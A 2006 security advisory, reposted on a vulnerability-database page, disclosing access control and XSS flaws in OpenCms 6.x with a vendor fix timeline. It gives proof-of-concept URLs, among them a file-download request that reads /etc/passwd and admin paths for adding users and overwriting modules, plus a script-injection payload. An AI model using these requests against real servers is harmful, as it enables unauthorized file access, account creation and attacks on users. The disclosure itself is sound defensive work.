Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

OpenCMS_multiple_vulnerabilities.txt

🗓️ 28 Jul 2006 00:00:00Reported by Meder KydyralievType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 28 Views

Multiple vulnerabilities in OpenCms 6.2.1, 6.2, 6.0.3, 6.0.

Code
`  
Multiple access control and input validation vulnerabilities in  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
OpenCMS (Open Source Website Content Management System)  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
  
0. ORIGINAL ADVISORY  
~~~~~~~~~~~~~~~~~~~~  
http://o0o.nu/~meder/OpenCMS_multiple_vulnerabilities.txt  
  
  
I. BACKGROUND  
~~~~~~~~~~~~~  
OpenCms is a professional level Open Source Website Content Management System.  
OpenCms helps to create and manage complex websites easily without knowledge  
of html. OpenCms is based on Java and XML technology. [1]  
  
  
II. DESCRIPTION  
~~~~~~~~~~~~~~~  
OpenCms versions 6.2.1, 6.2, 6.0.3, 6.0.4 (possibly older versions too) are  
vulnerable to multiple access control and input validation vulnerabilities,  
which allow authenticated users to perform the following unauthrozied actions:  
  
* View and download application's log file;  
* Download arbitrary files from the system;  
* View sources of JSP files (provided they are locked by some other user);  
* Add webusers;  
* Upload new OpenCms modules;  
* Overwrite existing OpenCms modules;  
* Upload database import/export files;  
* Overwrite existing database import/export files;  
* Send broadcast messages to all users;  
* Send JavaScript to any user (XSS);  
* Obtain list of all users and groups  
  
Most of the access control vulnerabilities mentioned above can be exploited by  
accessing the URL that provides the functionality, while logged in as  
unprivileged user(member of Users group).  
  
The following URLs (wrapped) can be used to reproduce the vulnerabilities on  
OpenCms v.6.2:  
  
* View and download application's log file:  
  
http://[target]/opencms/opencms/system/workplace/views/admin/admin-main.jsp?  
path=%2Fworkplace%2Flogfileview  
  
* Download arbitrary files from the system:  
  
http://[target]/opencms/opencms/system/workplace/admin/workplace/logfileview/  
downloadTrigger.jsp?filePath=/etc/passwd  
  
* View sources of JSP files (JSP file must be locked by any other user):  
  
http://[target]/opencms/opencms/system/workplace/editors/editor.jsp?  
resource=/index.jsp  
  
* Add webusers:  
  
http://[target]/opencms/opencms/system/workplace/views/admin/admin-main.jsp?  
path=%2Faccounts%2Fwebusers/new  
  
* Upload new OpenCms modules (by uploading the file with the name of existing  
module, it will be overwritten):  
  
http://[target]/opencms/opencms/system/workplace/views/admin/admin-main.jsp?  
path=%2Fmodules%2Fmodules_import  
  
* Upload database import/export files (by uploading the file with the name of  
existing import/export file, it will be overwritten):  
  
http://[target]/opencms/opencms/system/workplace/views/admin/admin-main.jsp?  
path=%2Fdatabase%2Fimporthttp  
  
* Send broadcast messages to all users:  
  
http://[target]/opencms/opencms/system/workplace/views/admin/admin-main.jsp?  
path=%2Fworkplace%2Fbroadcast  
  
* Send arbitrary JavaScript to any user. Input the following JavaScript as message  
body to be executed in browser of user(s) message is destined to (XSS):  
  
</script> <script>a=/XSS BUG/; alert(a.source)</script>  
  
* Obtain list of all users:  
  
http://[target]/opencms/opencms/system/workplace/views/admin/admin-main.jsp?  
path=%2Faccounts/users  
  
  
Vulnerabilities outlined above may lead to server compromise, loss of confidentiality and  
integrity of data stored on the server.  
  
  
III. VENDOR STATUS  
~~~~~~~~~~~~~~~~~~  
Version 6.2.2 has been released to address discovered vulnerabilities.  
New version is available at:  
  
http://www.opencms.org/opencms/en/download/opencms.html  
  
  
IV. DISCLOSURE TIMELINE  
~~~~~~~~~~~~~~~~~~~~~~~  
13/07/2006 - Bugreport describing the vulnerabilities submitted  
18/07/2006 - Initial vendor response acknowledging issues  
20/07/2006 - Fixes commited to CVS  
21/07/2006 - New version(6.2.2) of OpenCMS addressing the issues released  
  
  
V. ACKNOWLEDGEMENTS  
~~~~~~~~~~~~~~~~~~~  
Alexander Kandzior and Andreas Zahner for timely response and resolution of issues.   
  
  
VI. REFERENCES  
~~~~~~~~~~~~~~  
1. OpenCms (Open Source Website Content Management System) homepage, http://www.opencms.org/  
2. XSS Cheat sheet, http://ha.ckers.org/xss.html  
3. WebScarab, http://www.owasp.org/software/webscarab.html  
  
  
--   
http://o0o.nu/~meder  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
28 Jul 2006 00:00Current
7.4High risk
Vulners AI Score7.4
vulnerabilitiesopencmsaccess controlinput validationjavaxmlxssserver compromisedata integritydata confidentiality
28